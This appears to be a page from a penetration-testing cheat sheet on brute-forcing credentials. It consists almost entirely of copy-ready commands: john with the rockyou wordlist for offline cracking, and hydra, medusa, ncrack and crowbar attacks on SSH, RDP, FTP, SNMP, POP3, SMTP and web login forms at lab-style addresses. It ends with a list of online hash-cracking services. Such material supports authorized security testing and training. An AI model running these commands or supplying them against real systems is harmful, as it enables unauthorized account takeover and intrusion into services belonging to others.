08 BruteForce
Offline
Online URL
1
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
2
medusa -h 10.11.1.111 -u username -P password-file.txt -M http -m DIR:/admin -T 10
3
ncrack -vv --user username -P password-file.txt rdp://10.11.1.111
4
ncrack –user username -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.10.149
5
crowbar -b rdp -s 10.11.1.111/32 -u username -C /root/words.txt -n 1
6
hydra -l username -P password-file.txt 10.11.1.111 ssh
7
hydra -P password-file.txt -v 10.11.1.111 snmp
8
hydra -l username -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
9
hydra -l username -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
10
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
11
12
# SIMPLE LOGIN GET
13
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
14
15
# GET FORM with HTTPS
16
hydra -l username -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
17
18
# SIMPLE LOGIN POST
19
hydra -l [email protected] -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
Copied!
https://hashkiller.co.uk/Cracker
https://www.cmd5.org/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://crackstation.net/
https://crack.sh/
https://hash.help/
https://passwordrecovery.io/
http://cracker.offensive-security.com/
Last modified 1yr ago
Copy link